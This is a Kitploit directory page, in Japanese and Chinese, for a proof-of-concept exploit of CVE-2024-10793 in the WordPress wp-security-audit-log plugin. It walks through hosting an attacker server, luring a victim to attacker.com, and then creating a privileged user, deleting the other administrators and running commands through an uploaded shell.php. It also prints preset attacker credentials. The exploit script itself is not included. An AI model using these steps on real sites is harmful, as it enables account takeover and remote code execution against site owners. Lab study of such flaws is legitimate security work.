Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10793 — 针对WordPress wp-security-audit-log插件的CVE-2024-10793概念验证漏洞利用。演示通过精心构造的HTTP请求进行账户接管、创建特权用户、上传shell和管理员操作。 | Kitploit
ツール/GitHubGitHub/mahajian/cve-2024-10793
特権昇格脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペイロード開発
GitHubmahajian/cve-2024-10793

CVE-2024-10793

针对WordPress wp-security-audit-log插件的CVE-2024-10793概念验证漏洞利用。演示通过精心构造的HTTP请求进行账户接管、创建特权用户、上传shell和管理员操作。

リポジトリを見る
2111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10793 PoC

以下の行を hosts ファイルに設定してください:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

docker を使用して Wordpress を起動します:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

http://goodcms.lab:2121 を開き、wordpress のインストール手順を実行してください。 wordpress に wp-security-audit-log.5.2.1 またはそれ以前のバージョンをインストールしてください。

攻撃者サーバーを起動します:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

http://attacker.com を被害者に配信して & Bingo!

エクスプロイトの影響:

  • 特権ユーザーを追加。
  • 現在の管理者プロフィールを変更。
  • ハッカー以外のすべての管理者を削除 :)
  • シェルアップロード
  • ログアウト

alt text

アカウント乗っ取り & 特権ユーザー作成 PoC: エクスプロイト後の攻撃者資格情報: { email: [email protected], username: amin, password: 123456 } (xpl.js コードから変更できます。)

シェルコマンドを実行: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

ツールをダウンロード